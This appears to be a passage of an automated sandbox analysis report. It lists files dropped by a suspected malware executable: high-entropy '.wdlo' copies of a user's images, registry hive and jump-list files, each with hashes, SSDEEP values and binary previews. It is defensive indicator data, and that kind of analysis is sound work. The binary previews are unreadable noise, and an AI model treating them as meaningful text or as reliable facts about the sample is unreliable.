                  SHA1:C8A7AF4EC2FE90AECC7CE2C9641C558EBDD46A31
                  SHA-256:E06E1EDB1CE0C60F48B4509065ADC60BF20CECEF4827E51BE69DE9A4E78842C9
                  SHA-512:AFFCA91631D5000F7C23DE9CC2D51C9F225D4853B2C0D65EC1D03D6DBC7B4062EDEEA7DAEB05C1742F883694E19A3E1F7A331EE4A59349EF6AF3F0F60A588F42
                  Malicious:false
                  Preview:..[*W. ...:.~\m..D.gp&O..;d..n.9.........l...l5Z..w...pX..x'...o.k]10.px.n..&....>{.+5...^.cv...^....N-..lb.'...fL(.........0...5.H...y.`cj.!'i.Y.;.R2.<l..^^e.rS.P...|.....w....]f?.=....Z.o.ON......,....X.....K....N.#c.[.t........&(.3..OQEr@..,.V....$.x....*...r\.3+'}......,...B%...E.k.<R...h........ .]:...~.j.L....F.$.......!..*%.lZN"S..%.+.d..8..^..8....P.{..I.~.)].E...43.2Td.R..)...qo..C"..%].<M~.>..{."c.{..a:.[...e....%&3z.l."..c..z.~...v..Nq..d.^;...y'......U~W#........A=..OWj..n.S..W.....l../..5g....@...6.....3L...D......r..$..E.ai.).*D.\>EG$..Q....y?....)..Q..fl?...!:..;.;..|.r..Q..;......a.B.(....]:L.....Wv.^L.H....(.?..m6@....S....b........+=h9..<.p.u.U\V......z'.IF..J:V........Zi.7.)..3.!>...<.B.fOp&..R.h.._....~9I.G.........~..8k5...x.q.{.9.`..&.E b..0.7-$].F....W...6.6...V..N...C..^.....[...n.....BC........z...?E.G.4~..._._w.Y.~L..a.R3.c.X2..*.{{..t(.......f.....Q2xGgm..i...N.i0fXrUHVihm5xsI9Icg243YMPJqd748Ocimkyjt1{36A698

                  C:\Users\jones\Local Settings\Temp\{5871238D-BEB9-464A-931F-701C8F0FFB10}.png.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):6130
                  Entropy (8bit):7.971225713702486
                  Encrypted:false
                  SSDEEP:96:ZLo7e+ZMyC987SObx+IHDLydpzGd/I5aTABzXwR/f01ZaPyw1Z40et6gp:VoS+ZMj9IfjKp/mRnM0A5
                  MD5:D2139D859153496EF36CB45D9933EDE9
                  SHA1:4A9D965F47E4496E991C572483425E720336C64E
                  SHA-256:E3CC9861B905D6866931D831337ED427EAA2858610A99288AAF6447EF14347D8
                  SHA-512:AE09C14BAC2DB1B4F9DA65F67B40BF125782CE88B337710121121D421FE8CA186E21A936895C9C6024C15838F33CC39DC3D65EB879468129EB2A0F3B0CCE2415
                  Malicious:false
                  Preview:.PNG.L.@.@"p.H..]+_......M...s.o.o.y..ek...F!C8.%..Z........K3vm..%......U.......^#........$.D.......7.M#..1It.w.p--P..n......T.... ....84T.0:".(.........{.d..1s"...R#H...l<s..l%*..d.../.c......l.r..E#..<..4...TM'.~yw.A.e...e...P...k.gV.......6...B....rx...<Tl..T...6o,j)..|.?...`U...eu.cL......I....t#..~'.:n.-)....W.;.*..w.h...f.x|.D.Gqo..X..S....3..dCC.9.9...QgGk.a....by. .W.J.U#0%.Y8.nB....W.~j.T..)j`....?V5..=J.]....!K....T...U..Zo..;.}.....jH....u-.O.D...8..f...=&d.'a.. mr..K2RJ..M.?3..........+^V.f..9.*...I.&.K..7#..ei..G.0.s.....t|....@t...R...A...T./....V|p.32x.-...L......B.I...~..F..CUN.c.z........S.OYr....=-.>pf>{..[(..[.]Q........=.'...W)..N.....`6...4.p.-...]..w..P.z=.!.r|%.#CC.k.+-..R..`.B3......[;.R.....E.D..9..nW.D..\.S....jx.....OX.......^P.C...e.0Cb.2....M..E.:GW..0..9..".<.~_.'.BFM..).'.I....A..i.....?3\.......S.y.t..N..2...:.`.v.......,_..2e|...e...W..^B...##.......+T......A......q....!.o.V-.%.W.C/.......K_T....?

                  C:\Users\jones\Local Settings\Temp\{5F969F84-5F34-4AF8-8D36-D6D6A1668750}.png.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):6130
                  Entropy (8bit):7.967348074396973
                  Encrypted:false
                  SSDEEP:96:daOScvm6jrCejRXBTk09IvM0OKK1Ylrnc11IUWI0aTwAEVWF5R47W69VZZBMNxA5:QOScvbieNBTkaOMB91inQIUWATwgjmjD
                  MD5:61C5ABC38759CC7D91A0FF569EFD7185
                  SHA1:5C7938B737C0F53EDC4C44C4AD73AA438985B4FA
                  SHA-256:2BFD1FA24EFB44A30A20037A66FFE438FAC3B8BC7DE8F577B3FD5AB79846CD44
                  SHA-512:2A088CBF817EE5E37B9A876F5E4230749D802212314DD6EABE6A3C49304EA4BFDB510CAFFFDCCC8F6B3DE9A774ADAA0C2E8A674FB58200C937F5DB6507AF9B5C
                  Malicious:false
                  Preview:.PNG.0[..X.e..)=.Hy ......J..=?...n1|...%|..b.....I.4S.D,..bFa....@.....%.~.:`$.LjA......|T.....e..4...e.........}N.b..N.o..o.P.+.....>...jm7...|.....fz..b.+(L7.KZ..-o_2Y..~...z.>r....E.f.K+..?.UP^Y..i.5.......> >.YH.312.E...0.Fa....N..&k8k......RJ..W..D.. J!.;.t.L..'......a..$$..K.yG.1.....KsR..L.iK...X.9.{......2......h..!.O...M..6..0^....c..>*5.L. .n|.....f.|}. z....6P~.}\..x..`t.Q.YU...D_[....g.o.....Y...sA..p......>...[.....^.......B..9L(...TT......J.KQ.TZh...$...z...Oq....LY...*[..o.....=.et.....X.1.'.hu67.@.A......>.`...&..t.....bi...|...5.....c.b.^..(..'...F....>EQ}T;.R......:BO..yF..`.../U=..u.2W..2@.So.Yq;4"N...fY..%Q...Ua..b}.'..I...@.m.y..,.e&6..o.0E...8.y].buP......V..P.......M.G...+...F@Q n-.U.E....Z..Z4[y..x...,..G....?...C.1.,-....e.)..cU..j..@m..L...i.... N.E.0.g....pN...UM.;..[C.....(.....iK......L.........';x..K..8.. U..........h3.p..i...f.......Aj...;......vs,c.-.....tO..... ......G...CK..H.$...`.....

                  C:\Users\jones\NTUSER.DAT

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:MS Windows registry file, NT/2000 or above
                  Category:dropped
                  Size (bytes):3408206
                  Entropy (8bit):4.9172859279394965
                  Encrypted:false
                  SSDEEP:49152:lQlnPO/SyDIUHUpElepQM4DpaNYRXVmpaNYdD:lIPO/S5l
                  MD5:3DD827B8FD9A251B73B18646371BA524
                  SHA1:6CDDB4A5B04DF59DF27BE85B261B2E8DC653023D
                  SHA-256:F9EC1E5CC46A7A7B66F5ABC7D83D08A92EE8696AD2B0F00A7E623C496D119A0A
                  SHA-512:511DDA8596B6CE039AD7D1AF0E89D044C8EE6782EEE2D60711537591160FF31411921833B9EE45F0488A2D066826C06802FAF11B4A0358D8990783DB9422E3A1
                  Malicious:false
                  Preview:regf.yOg.mBK!z.v.|,.B.........y2..3..t..T.....cq....A..'.*.cP=.i;.v...T.eD.j.L........vN......3......UI.........BXj.......o.@....D.) \af...Pz/..jc)+.P.....2G..>...5;v>(..S\.M..3V......Q....t..~..E.U7.....VA<.i...=.T/.=g.W..Y...mL.#..?.^.[.E.c..:d}....C.hg1.#.K..WH.|..R..K.....TY...Ha2.jO.`/....F.......4..S7...e...)PAt..#...q..r......h.D.....7.F8$.`&."...9)/......\.rk.|.W...z;.X.......S%.k..."ZJ...7.X{....e.M..'....3+#..-,.,v.$......T^8..3...=[O.,L...).=R..AZA'A..|rD.#.N....=.6.R2.GP....H..C...D.V]..%N...._...P.H.+.~..d\..sh>>0,.E:t........"'.F'..v...2...x...g.0..i(.n...p)oLPj.a..,O1fm[.O........(]WV3...Z...P.Y..R.=..(...!....t.. r..Tq..2.U..W:.=z...RP<...... .....yk..s......h.@.A....N..}M+.......L..*.n.j..t0.1%*.z.FuM.R.)j..`..=E|I.-%&....i.f.....>.G...3..c..!6...h....r....5...D..K...P.z..tJ.C@.*.....rK..y....AA..). .T..#..xu]M.0z.QM..#.....;$..i+.r6...+..?.."..I.._.i..V6/Q..1^..D...\&M.^..5.{..k.U.g>5.d..,.M.....4..y.#l....C.....g.\.g

                  C:\Users\jones\NTUSER.DAT.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:MS Windows registry file, NT/2000 or above
                  Category:dropped
                  Size (bytes):3408206
                  Entropy (8bit):4.9172859279394965
                  Encrypted:false
                  SSDEEP:49152:lQlnPO/SyDIUHUpElepQM4DpaNYRXVmpaNYdD:lIPO/S5l
                  MD5:3DD827B8FD9A251B73B18646371BA524
                  SHA1:6CDDB4A5B04DF59DF27BE85B261B2E8DC653023D
                  SHA-256:F9EC1E5CC46A7A7B66F5ABC7D83D08A92EE8696AD2B0F00A7E623C496D119A0A
                  SHA-512:511DDA8596B6CE039AD7D1AF0E89D044C8EE6782EEE2D60711537591160FF31411921833B9EE45F0488A2D066826C06802FAF11B4A0358D8990783DB9422E3A1
                  Malicious:false
                  Preview:regf.yOg.mBK!z.v.|,.B.........y2..3..t..T.....cq....A..'.*.cP=.i;.v...T.eD.j.L........vN......3......UI.........BXj.......o.@....D.) \af...Pz/..jc)+.P.....2G..>...5;v>(..S\.M..3V......Q....t..~..E.U7.....VA<.i...=.T/.=g.W..Y...mL.#..?.^.[.E.c..:d}....C.hg1.#.K..WH.|..R..K.....TY...Ha2.jO.`/....F.......4..S7...e...)PAt..#...q..r......h.D.....7.F8$.`&."...9)/......\.rk.|.W...z;.X.......S%.k..."ZJ...7.X{....e.M..'....3+#..-,.,v.$......T^8..3...=[O.,L...).=R..AZA'A..|rD.#.N....=.6.R2.GP....H..C...D.V]..%N...._...P.H.+.~..d\..sh>>0,.E:t........"'.F'..v...2...x...g.0..i(.n...p)oLPj.a..,O1fm[.O........(]WV3...Z...P.Y..R.=..(...!....t.. r..Tq..2.U..W:.=z...RP<...... .....yk..s......h.@.A....N..}M+.......L..*.n.j..t0.1%*.z.FuM.R.)j..`..=E|I.-%&....i.f.....>.G...3..c..!6...h....r....5...D..K...P.z..tJ.C@.*.....rK..y....AA..). .T..#..xu]M.0z.QM..#.....;$..i+.r6...+..?.."..I.._.i..V6/Q..1^..D...\&M.^..5.{..k.U.g>5.d..,.M.....4..y.#l....C.....g.\.g

                  C:\Users\jones\Recent\AutomaticDestinations\162797d679096999.automaticDestinations-ms.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):2894
                  Entropy (8bit):7.9450750667938195
                  Encrypted:false
                  SSDEEP:48:3whJpcLgBAdOq3ZzwbSYYGSxk7BPIXoq0/PTQqLZNAwI4sfaPPMadJDpmltS3nD:3KJmg2dOQZzwbSYek7SXoq0nTQ8NAP4j
                  MD5:5194A773EDD54A94ED9805210E1EED36
                  SHA1:647E93AAC407809EA61D83610697C2326FF3B1C3
                  SHA-256:3762ECEECD150FBBF26DF9691544FE679AA2257795C0634F023639512AE7DEFA
                  SHA-512:4131B80A56FD4AE7FEC03D083EE9BA69BEB9EEB3A2D8F2997A7B9B014E678882894D15D57EA2E6152F23219827AF30D6A72818112FC1BDAD2D3F52C734E4819F
                  Malicious:false
                  Preview:....I..........#d.n.......C>.W.[..5S......`..?..P.)7./.>.._.[t9.J.V...."...6I&Y.;...y7.7N).i9......9.:..%..n....k.{.JM.i.xLv...*...5..1.-.S..`......'i....u.n.h..3.'f...n....P&..W....06...B../.....6`q.[..@%......?.b....:.t.k.../.$....E..s...3O.l.u.rp.(.^`..c....f.X..dSD.....8.`.R.v_:.>..6..W...M|r9.?2+..u......V..I.p.)..>.......i....oZQ..#...\.f.O...BrQ.m..:g.-?...#.........#A...4.7......%..s.b....\^..SM>..K4=..\..w.>....z.G.._E...O*..E..}...t.............%y....".Q.... 9`t0..5Q5;..H...1..v..$.t....3;..Y[o.....3JV.}..,.wy....`2..2.|.m....(...3.=...(uh.Bm...]...*A..sB.gk<V]....0..+[.&j.....z...=...u<....V.....n...1)..\4..P.)..hf..!.Z..a.=u...9.+..j...#.......RL."K...22.v.ea>...nx..,]..%G..#.nl.E.r......:'..#..]s..@}.?,...;..N...T...@.4*w|.....<....=.3..v..'..7..T.Sr.@.....N.m...]..k...........=..[d.....>.i...x.b..4s}.A..pn......,..l...}.......,w.D..v...[p.L.F.C...n.......L1.4.p..."...UE...5...T....Y].Y.ei........c`..c......... .T"..i..~.

                  C:\Users\jones\Recent\AutomaticDestinations\1b4dd67f29cb1962.automaticDestinations-ms.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):4430
                  Entropy (8bit):7.960403613445905
                  Encrypted:false
                  SSDEEP:96:ofFAfWuC425S9xFp5PDJYtik67hd12N6ZsMdcl27n8wojxzT:2+WVS9NrSik67D12N6yMdckVoh
                  MD5:519D2E183101DD80363363D111E4B440
                  SHA1:6950AE6401791AC7BC3B115A862A68BD4095A0C3
                  SHA-256:BAD0E3946B1FDEF13870FBB2C6DE0DB9BC67089CD0E014E9D8BCDD0607DDD4E4
                  SHA-512:7749EBC86EA0B4A5DB1EF257BA90DA493AA44240422D7609D3C74316F7E4729D5AF704CAC5DD129C20B4346852B74F0D4CBB77AE5A3E839C012754CBCD1CE919
                  Malicious:false
                  Preview:....RBV...Z....;.!d..nsJ...<7).W.)...S....dM.J..t.9x......A7.DRU.V@..v.z...ZxA..b..2-..P.E.*p!.=k...{..F.t.<V...%.].<m..+....5Q....t.}..Z....7.4........{...IO9.pJ.N...U.X:.-...I.qmJ.ds.....X..0n.....aF.os)@|.~.2z......{..5..v.}.s.{.g...M....3a).z...md........{..V.X}.G....B..4..6i...Q|N...).gS..]*.qm\25q.#...}..' rY.RR..CH.jN..qC.H.%.z..#.m.s....$...*C....;...X..b.7..u^...j....F......m..A.k..^.TB.....|.I(D-.|......f7..)jC..N.[8K.H..u..e..m&>..p..3.xG..L.p...0...Z .wc..5..r.F.|....}i.AH.9....S.b. .9..\.n.|.!6\[j.......*.R....V.S....~....I(...~$kV.W.......6...X.$..........a.....j.......C#..p..*.Cu. ...h0..'...Z2..."..].....q.z...S.ab..u...c.^.....{.u..L{h.J...5n.E%....y...(,.......=.....(3.....Ok...&8..ir........c.2..7{.`..|.0...*../hU....w.3...G..!...."..lT=96.4)~{on...Yg..f..)q.)ab>2.&Gd^.73..A.......EA.d`.p.f:Oy..7..d...=.y.e....:.#..oKe.+...tY.9i.Fh;Z...b....e1..t.....s(y........~..7V1....$.&.%$..Q/....(.. 8.E......;y#c.

                  C:\Users\jones\Recent\AutomaticDestinations\1b6ebacd7cd2f25a.automaticDestinations-ms.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):2894
                  Entropy (8bit):7.943754329234538
                  Encrypted:false
                  SSDEEP:48:h1APr3QeO7e3WHGTFB7Zhk+RjPEVVYwtrTPoqVkPc3nD:83jO7e3WmJB7AIqVDTwqVh
                  MD5:AC66B9216BF50EBA819C2E3305397860
                  SHA1:19C3060AD3F64D94E25FA79F632F84A917CD9CD6
                  SHA-256:5689918DC24613667EFDC1017D6F52A2F196EBFEE32640F9C6E8FEAE859839D6
                  SHA-512:2B814D337F27619CCB73FEBEFF577372F3E775BE6631EE01D03D98E11B45C4B5D5E2D9AAF70B68091B95035147749744E48AF59561A2C5E6A02F7820F861E86E
                  Malicious:false
                  Preview:.....>.j..m.yoZ.;>./..b&G.Y*.i....6......n..`*.Tbf>.{.g'.l.un1......,.>.KN>..*+....:.#;....&)C..6.n..E[./....E.9V.t.{.h(..D"C]....pql......T+W.~..Kf..}"12.-k..S...D%...g...[..SE....}+...Mg..m.._.....uF.n^...f.-?.BSeW.N.+..WO.x..N*.&H9h..X..*;zP@..{..DN..M......;.G...e.VN..7..w..i.Dv.X.........Es*.h..oi..7.V.GWGN..~H..aV'.:.~.A3.[.d..t..kN..Ctf..{...C.b.{.......w.}.')Z/..Dg%..*..C...'..}..2.I.s.T.,.P...J5"..,U,y8.X+.[...X.m.).1B...}K./.^.0. ..Ld]h8..D.?....L...e......gy...n....@...qR.q\...E&.7d) .C&....W....).. ...y....i\k._!......#.Rcc..3.............:..G.E.a.{..'.w*[.u...)....>..*..W.L.l:..._...U...........`..9..O*"...v....@PY...H...[.......6.g........|;C......;].e..S....S"qa..X.(...L..N...a.GgO..Z.D#e..m..0.....n....cNk.5.....B.......^dT_..2.]....*lR..&.._.z.h&......DE.................yu.m,..=..o1z.H...~..W.XiT`<.b&..fH.`..}X.0.@3.yQN. ......:.8.r.A.....y..JJ.E< ./..V... .m.\..G<%.0...N......|..j...%D........Y..............k...-C.'.*.

                  C:\Users\jones\Recent\AutomaticDestinations\1bc9bbbe61f14501.automaticDestinations-ms.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):2894
                  Entropy (8bit):7.931770304147287
                  Encrypted:false
                  SSDEEP:48:FoO1EoQaGkqwAHULe6UWd8fh1yHrjB/nykoNTLRx0+i1yd9n44yfjXF3nD:Fo4rCkYHCdSh1ErjBxgL6ydVbyfjXZ
                  MD5:88673E5564B77F1C57B6B47D059F4527
                  SHA1:00FA99847B371090FE0CB03176533407C583C7A7
                  SHA-256:4E9055B18FE68D1E3FD0BDDD1E34C65664AAFB8731C59C170117EED525409AAC
                  SHA-512:BC9054E9585502AC2CB65617BB4A632B9620DBD4697EB4422A9FA4B3D3A90DEBDB55BB471F35B5D1989CF86185AA592A4DA14333E07D0FC1EC66799FFFEC35A8
                  Malicious:false
                  Preview:....;=y.0.=..EEnF.y...p......3@........i.S..Rs).x.,..S.]..}Y.7. .]2..{...\...^...4...=).c|.v.^7I8.{.....!4{5{.Tw!.o.h...G4..).....k._.q.....D.SzaKa...v.bP.6:...K.!T.49.I.......8s.m[..,n.4:..<.9.O.1.<.5..i..)l5.#...E..jU|`x.n..O.m.?....`..2.(.........o..{.c|..\..........L&.,.`q\s|.`h'%]..~.@..L.VY..uml.,9...i....e.Yt..(....qM (......-n....rGT.4.^7ck`.........R.~z..<.#s.2.q.}..F.Y...|.^....H$.~....mD9s)..}.q..(F...?....#K.D....Bd..gV......bp....t.U' ....U...<T.D.g...H....D;b..ep...1~,..l..g..X..F..d;o.5.ba...84.dGJ.L@.g.....1j\h..p..BWD....a.lp..&k.9k..s.nh{oa.C.DE1..rd./..k....?JTK...(.y..a$*.!....=.t.-....1.S..F..0k....t...[.....I.....\....s.0+.k..t..`..../l".1...M.yy0..Gy.....t.;>W...MN.i.&.wJ.Q...bd....s.g....>.7.-8@.N.W.B.8z..............u.S8..IZ"....*...Bf|..Fnd....:.It...#......8...&.D..;...gd..j#&..f.`xe;..i..8m.G..9...a]..@y...PSX.?*..........B>..$'.9+DX.@.....E..U&..J....AR.s]G....2.O[.._7...V.nBI..:VI.L.UR..z...B.]8...$..6.u).1.l.....

                  C:\Users\jones\Recent\AutomaticDestinations\319f01bf9fe00f2d.automaticDestinations-ms.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):2894
                  Entropy (8bit):7.932158693132771
                  Encrypted:false
                  SSDEEP:48:loDIx8Cztg7D25ofpA0V1BNbsOAKKVqy3SrS0F8pUdF9Y7GSFm+5LEzEP/4qq3nD:n+7K+xXVzNuKOfSrS0F8udF9qGaB5LEt
                  MD5:46E92578F5F5CA4608E926C3941D68B0
                  SHA1:42C58BFCD772411D6DE24A64436A6D0ADD2652F8
                  SHA-256:EDA508D46C849FFB6107D220F039737DAF969F17BBEA658E54F6E309B892A548
                  SHA-512:3D9DEC06A5BBAEDDA3C673C2FA64804FF77BA45F7939C9D956F1514DBE30823E6F12B24E9C0F27AD2FFEB45C0305F7C977B1FAB00255AC877C30F8FE30ADC786
                  Malicious:false
                  Preview:.....[....v...)8..y-IF3x^..B.6C.......4*.0.......g....]e.*Mz.0...e.e2qfyQ......d._R..+.'Ppp.U(.|.,..C_!....).d.o.m.fp..F.,."3R$-.......KC..eP.Y_-........\XlH..q....3.?z.h`K.6..v....~^....8...'....[.w.h.m..6NQ....c8......iH.KI.m...?.h.h........"..../`{..,e....2N.>..|..Y14,!.......-.dK/ <.K}.x..|..}.y.....7....~..3].]......z.C..g.^...<..}T..Y..`.E..N.`.^U.Q..D.3cW....h.X!..z.`Lw`..J.!....{E...B.................]...<........>...8v....s..[......M.....D..p...5.?..Z...c.....d.n.....+[.2...0P.{y8...*.R....e.L'.9.%.d.2.2..`.. Jj.w1...x.h*..|}n~N.r=..,.....>.fx.......c...v...^f".z..-.5%.....#..%.......H..<........Ai..K........`L.H1[iF....Z....f&...!....`.l*E.l.q.[.*&.ha.B..g..y8.>.^.i...c..E9..b./{..mt....}3.s..K...)...p%.d.._1B!>.....D..../.....2M..W..&`r.Ti..3MW.h}7S.\{.d.3......S.iH.x..S.;s..Ca.....F.YB.8...6..w-....(.0E..F...oq.a..q$....z.EW.Z8.7.`R..f.W.].}.`E..L7...,.gw.o...9.\.':$..f.$.A\..?[.r/.\.n....q..w.m..p..K8.\O...x"

                  C:\Users\jones\Recent\AutomaticDestinations\5175b273ceba776b.automaticDestinations-ms.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):2894
                  Entropy (8bit):7.940258575975371
                  Encrypted:false
                  SSDEEP:48:D2fvVJut+TTjTxYifk2rMQjQqu05eCNc+bLwdULZMP93CQLfrBKyUivOttCRq7DI:Av6EHjLzrMQjQq9L+bTHO7CODOB
                  MD5:0CEDB5090885D5E6942289DCA0B83111
                  SHA1:7DF58DB7669F131B9FC346B2D87B1DB0F7BBF116
                  SHA-256:8C83BFABBD10FA4F74D0B2FF01CC7EB1743CF669E5F3A48B07C1DFF15C926195
                  SHA-512:CFE941260524E2DF1622A776C77EFEDC1CDAD87E29E5B50A16DAB0F500EDA03E67A970E49372F29EF730C13C11FB6FAEF1896A6E894DB82691E94244C97AAD09
                  Malicious:false
                  Preview:........v.O.k..Hv.\ ......-.j;.........s.Q{C..].z.8......-P.J.K8.d...3M^.........O.<hBU'.....Rf...9.*...~.N...V..qY.,..../.!..S.....-i%.k`\..7Qwb..+.c.......3._a..(..[V.tH-.a.,.].x.},....2..F...k..H...J....!.2+.E...u......'{d...us.A8A.6..o[..w.K..t.?.t.CP..*.Hu..gD..2....z.j`./...k....nq.z..q.=y...Lin.....>}..aO.4.#.<#.<Q..(....6v.15|4P.p{..g.\...,F.sZ.385...s.D"..7.}.jD_..~.ua"..NJ..k.. 9..\f`...c^(U...U.....Y.0.I./.z .......k.sH... .}Y.0Q.o.@.Z..?...........Z.b....8.xhir..%...............}.=.+......1..._.../>K.2+.=Z....1_.......J.9!...#Lv...y...6.d..5...B.A.]..oX/..`......o....z....&..N.wL..7/.j....#.B.......>W4zh.4,..y..i..m4)M.%:....|.....e@3K..kS.D].m.FO....q..<.e.v...Ec.........l...>.{X.7V.4..j5.\.zVIN. T(.9f.n.`.$....&..wn.7.......g.....Xo6.......2.?)...d4.,....~..C.W..Ho.a..v......8].Z6.J...x.z.b;...v.](...}..d....wm......4..|3.O..5......(..L.+...`%......0/S.$....=.....0.].!K."S.n....HD..I...5)..7.lG..f<./..o.qy...

                  C:\Users\jones\Recent\AutomaticDestinations\5f7b5f1e01b83767.automaticDestinations-ms.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):4430
                  Entropy (8bit):7.95126661837336
                  Encrypted:false
                  SSDEEP:96:GBV8474YQgizaoMstDpvU6q1m2vabsvlCGHc:GBqgizazMtvvrXGHc
                  MD5:5F077206E0851D16492A5285E100C959
                  SHA1:05EB6AA289DB79F92D8101F346E6A4440E297DA2
                  SHA-256:0B5708ECD3623A480A19218140D44CE0D8F1EFE525A9B3474A5FC8311564E6A7
                  SHA-512:601FC692B89BBD797D2CA6E4532EC5BA1BA27801235C73461C40992DBFF15985A43A6A53B475A439FD451F7252C2EEA4F4CD278676168273F1291FE3460D3FBB
                  Malicious:false
                  Preview:.....B..p.8..Y.....#&....c.t...:.'.kD.4G.^.~]....)R91RP.Mg.O6.7....S....EO.)..c..v..U..$....3}.HJ.d.j-..8..K..6..`..^.-7...,){...=..w<..... 3.!#}....M...d..;`". ............0...)..j.O...o.&6.._..L.R^.....7(..Y.L.VL..>UI.4.L..u....T0NI..A.....h6...5......d.nGp.2.3..0.......b..Q.......-.".....\.4q.-wVxr.EdG..}..TO...G_7.......'......Vs...?>...yx>;.H.Q....!..V@...]k...J....R...vFX.(..i..S.b(....4.M..$1:4+..I.~0...;u.K[B...f{.m..x....m....#./....G.N..h..i....G.}P....Z.zv...P.....|..?...}........W...Rv...d2n\.q6..z....-J..5..H*..e..i..`ar.:....E....c..@JRxP......x....19...M...frGi....SV.$ ..N!......6.%..l.MO...T. 7..:].R.-....j..6...F...`.X..J..&}...J.-...5\...u.d.....V.l......^u.*..Z.>:3`Zs2........pr.pL...........:Y....4....TJU..........z.O~..%Pj.iRC......Pp.<..$..4>......C...mk._..CB[.|.....v.&N.\.N.H..../.}..w.3ja...6.E!..%.7#..shp..<l.E.f..)k.R..$..N,......6.. 2.}..RH......6...j-R.4.d.<H.33..\.Q...H:ocP.ca.....At.g.V....#;.u..

                  C:\Users\jones\Recent\AutomaticDestinations\61ebb1e65cfcb8da.automaticDestinations-ms.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):2894
                  Entropy (8bit):7.931590985934388
                  Encrypted:false
                  SSDEEP:48:H2K3nee5NsDretjR4wiQpFcbVyMikBSFdcydSruSif8EhIp8P0bx3nD:WKXxs3eBR4w9FcbWkBSFWASruZ8EhIpp
                  MD5:FC292691BC24CB3E1FF0E7F0DA9B75D7
                  SHA1:9076315B9BB2B112F8ED3F4513B2ADBFD3FAA71C
                  SHA-256:C95CA4018A873B3E77A8580F31C3B37298FBB820A768FDC1BC877EF44282C9D0
                  SHA-512:6DECD08B7FCB23F5FDEA0D439344A47E5F31A79D32EAC50C6F4624415D38246CBE7EB197305380A1B2B17868C45F0B3E67CB3AE699F246B091A75E3EE8486330
                  Malicious:false
                  Preview:......7...j.c.4.Q.......|:.Y........]58.....i..Cu.o.^S] ..A.<....G..l....,O..B.*..7....o..}..*Y.../=zjc.O. .....U...l..l.....P......u../2..Y.5..kGJ9..b.I.K.l.`...1...|@!.S.4s)+.?...g..|~..y..[.o.&B...INO.m.....,.{f^..(...../...1.jLS....?..8.p=..4....rY$...V...Q.. 8&B./..7PLT.(C..w<..+......Rhat...7..8........mH.$=.O<......9....N....2W6....^.`.......c.....9...0....Ud...-........,.O....z.y.O.....Z..9>.!...........].........J.zp.dTz.\`...JH..E....if.B{..s.....u>^9.\.TXe.X...;s.....[.|.._....?...S.m..4.'uU. TA..b.J.T5..<i.|...Ub..`...MOz.,..RQ....N..U..r&V..C.K.......[Ec.H...~.&.....z.......].>.4......L.p..vZ5....4.I........+;.."z.J.L.Xq.W..K-..w...i...........=....@...5PNJ..'.Q.,....(m+.....+...^5....{..z.*..y......r...D.C.zr.......=.G..\.c.%..y}M.Y..h .a.=h...._FZt(.!....-..j.....j.(.]....N..m*.......@....[C.U.....n.....r]f.2...2.....t...i5.....Y...IT.....o1~06.[.n.K....R.[0..'X6/.....=G..K"..k....x..j..>Y....1u.L....r,........UG.yf..;..

                  C:\Users\jones\Recent\AutomaticDestinations\6d2bac8f1edf6668.automaticDestinations-ms.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):2894
                  Entropy (8bit):7.948423128733295
                  Encrypted:false
                  SSDEEP:48:wUR2LUY6hu6DOnHhLQB4V/3bPNJGV0YHG7kZp9IS4bKY7gcVEPR/GxshivseYdzo:WqhuzqBMDNopHF1VTYUcVEPRM4ivhYdk
                  MD5:5E9AE5C4384CBFAE4F7F3A0F590B3C61
                  SHA1:D15212ED56C7F77ACF7E6C85ACC76F4A4E609387
                  SHA-256:8DB400A2FCABB46A5D4E7A69727533F402255EB1EF8BFB069573DD61CEDB82FD
                  SHA-512:418A084C410E153AECCA8E57411295AD58D3D76148514318527870ED4096F649C24511DE30731F112201DF222722F91E575257156133D92057C99E9D4BDDE19A
                  Malicious:false
